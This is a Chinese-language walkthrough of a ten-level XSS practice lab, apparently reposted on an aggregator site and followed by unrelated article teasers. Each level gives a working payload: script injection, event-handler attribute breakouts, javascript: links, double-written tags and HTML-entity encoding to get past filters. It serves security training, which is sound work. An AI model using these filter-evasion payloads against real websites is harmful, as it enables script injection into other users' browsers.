xss 通过秘籍

终极测试代码

<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>

第一关(没有任何过滤)

使用终极测试代码,查看源码

发现没有任何过滤,直接使用javascrupt中的alert弹框

<script>alert('wj')</script>

第二关(闭合方式)

先用终极测试代码,查看源码

<input name=keyword  value="<script>alert(/xss/)</script>">

我们要先闭合前面,然后注释掉后面

<input name=keyword  value=""><script>alert(/xss/)</script>//">

"><script>alert(/wj/)<script>//

第三关(过滤 < 和 ")

先用终极测试代码,查看源码

 value='&lt;sCr&lt;ScRiPt&gt;IPT&gt;OonN'&quot;\/(hrHRefEF)&lt;/sCr&lt;/ScRiPt&gt;

IPT&gt;'>
发现< 和 " 被实体化,不能使用,但是我们可以使用Javascript事件。

这里使用onblur事件。然后闭合方式是 ' 

<input name=keyword  value=' 'οnblur='alert(/xss/)' ''>

'onblur='alert(/1/)'

第四关(注意闭合方式)

先用终极测试代码,查看源码

发现没有变化

我们尝试第三关的方式,注意:这里的闭关方式是 "

<input name=keyword  value=" "οnblur='alert(/1/)' ">

"onblur='alert(/1/)'

第五关(大小写,script,on.)

先用终极测试代码,查看源码

value="<scr<scr_ipt>ipt>oo_nn'"\/(hrhrefef)</scr</script>ipt>"

过滤了大小写,script,on.
javascript 伪协议   a标签要独立运行,所以要闭合前面的<input>标签
value=" "><a href= "javascript:alert(/xss/)">click me</a> "

"><a href = "javascript:alert('wj')">click me</a>

第六关(过滤了on)

先用终极测试代码,查看源码

value="<sCr<ScRiPt>IPT>Oo_nN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>"
过滤了on,
value=""><a href = "javascript:alert('wj')">click me</a>"

"><a hRef = "javascript:alert('wj')">click me</a>

第七关(过滤)

我们用第六关的代码试试

<input name=keyword  value=""><a  = "java:alert('wj')">click me</a>">

发现href和script被过滤了,我们可以试试双写

<input name=keyword  value=" "><scrscriptipt>alert(/xss/)</scrscriptipt>">

"><scrscriptipt>alert(/xss/)</scrscriptipt>

第八关(html编码)

先用终极测试代码,查看源码

value="&lt;scr&lt;script&gt;ipt&gt;oonn'&quot;\/(hrhrefef)&lt;/scr&lt;/script&gt;ipt&gt;">
发现过滤了大小写,< .

所以使用html实体编码。 

javascript:alert('wj')&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;
&#x65;&#x72;&#x74;&#x28;&#x27;&#x77;&#x6a;&#x27;&#x29;

第九关(格式http://)

使用第八关方式,发现代码不合法。需要使用http://.

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;
&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x77;&#x6a;&#x27;&#x29;//http://

第十关(搜索框被隐藏)

发现没有搜索框,查看源码

发现是使用了hidden,隐藏了

我们可以修改他,让hidden失去作用
<input name="t_sort" value="" οnblur= 'alert(/xss/)' >type="hidden">

onblur='alert(/1/)'>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/178732.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

day27_JS

今日内容 一、JS 一、引言 1.1 JavaScript简介 JavaScript一种解释性脚本语言&#xff0c;是一种动态类型、弱类型、基于原型继承的语言&#xff0c;内置支持类型。它的解释器被称为JavaScript引擎&#xff0c;作为浏览器的一部分&#xff0c;广泛用于客户端的脚本语言&#xf…

【luckfox】3、计算重量差

前言 本章结合之前的hx711驱动&#xff0c;实现读取质量&#xff0c;记录时间及剩余质量并存入csv文件&#xff0c;计算质量差并总计。 代码 luckfox-pico\project\app\test_app\hx711\hx711_app_addtime.c #include <stdio.h> #include <stdlib.h> #include &…

NI USRP RIO软件无线电

NI USRP RIO软件无线电 NI USRP RIO是SDR游戏规则的改变者&#xff0c;它为无线通信设计人员提供了经济实惠的SDR和前所不高的性能&#xff0c;可帮助开发下一代5G无线通信系统。“USRP RIO”是一个术语&#xff0c;用于描述包含FPGA的USRP软件定义无线电设备&#xff0c;例如…

实时level2访问与策略研发

本周四下午4点&#xff0c;天软会聚焦“实时&level2访问与策略研发”开展我们的天软高频时序数仓会议&#xff0c;本次会议的报名客户&#xff0c;可以申请试用LEVEL-2数据测试账号哦~

Spring Framework 核心容器详解:Core、Beans、Context 和 Expression Language 模块

Spring可能成为您的所有企业应用程序的一站式商店。但是&#xff0c;Spring是模块化的&#xff0c;允许您挑选适用于您的模块&#xff0c;而无需引入其他模块。下面的部分提供了Spring Framework中所有可用模块的详细信息。 Spring Framework提供了大约20个模块&#xff0c;可…

业务连续性:确保稳健运营的关键战略

在今天的快节奏商业环境中&#xff0c;保障业务连续性是企业成功的重要保障。业务连续性不仅仅是关于应对自然灾害或技术故障&#xff0c;更是一项战略&#xff0c;涉及组织的整体准备、规划和应对能力&#xff0c;以确保在各种情况下业务的稳健运营。 一、业务连续性的定义 业…

matplotlib绘图

介绍 在官网上有更多种类的图型的绘制方法 matpoltlib中文官方文档&#xff1a;例子_Matplotlib 中文网 matpoltlib英文官方文档&#xff1a;Examples — Matplotlib 3.8.1 documentation 分类 一、折线图 1、要实现的功能&#xff1a; 2、实例&#xff1a; # 导入包 from…

每天学习一点点之从 SonarQube Bug 看对线程中断异常的处理

最近在基于 SonarQube 对代码进行质量优化&#xff0c;说实话&#xff0c;之前觉得 SonarQube 这种很无聊&#xff0c;但最近静下心来看了一些扫描出来的问题后&#xff0c;发现这种工具作用还是挺大的&#xff0c;能够帮助我们找到代码中的隐藏缺陷&#xff0c;从而夯实基础。…

三菱FX3U系列—小项目

目录 一、项目描述 二、IO口分配 三、运动功能图 四、项目程序 五、总结 一、项目描述 有些工作台&#xff0c;在工作台身上安装4个行程开关SQ1~SQ4&#xff0c;其中&#xff0c;SQ1、SQ2用来自动换向&#xff0c;当工作台运动到换向位置时&#xff0c;挡铁撞击行程开关&a…

网络超时检测-11.9

应用场景 在网络通信中&#xff0c;很多操作会使得进程阻塞&#xff1a; TCP套接字中的recv/acceptUDP套接字中的recvfrom超时检测的必要性 避免进程在没有数据时无限制地阻塞实现某些特定协议要求&#xff0c;比如某些设备规定&#xff0c;发送请求数据后&#xff0c;如果多长…

阿里云99元VS腾讯云88元,双11云服务器价格战,谁胜谁负?

在2023年的双十一优惠活动中&#xff0c;阿里云推出了一系列令人惊喜的优惠活动&#xff0c;其中包括99元一年的超值云服务器。本文将带您了解这些优惠活动的具体内容&#xff0c;以及与竞争对手腾讯云的价格对比&#xff0c;助您轻松选择最适合的云服务器。 99元一年服务器优…

23000 个恶意流量代理的 IPStorm 僵尸网络被拆除

美国司法部今天宣布&#xff0c;联邦调查局取缔了名为 IPStorm 的僵尸网络代理服务的网络和基础设施。 IPStorm 使网络犯罪分子能够通过世界各地的 Windows、Linux、Mac 和 Android 设备匿名运行恶意流量。 与此案相关的俄罗斯裔摩尔多瓦籍公民谢尔盖马基宁 (Sergei Makinin)…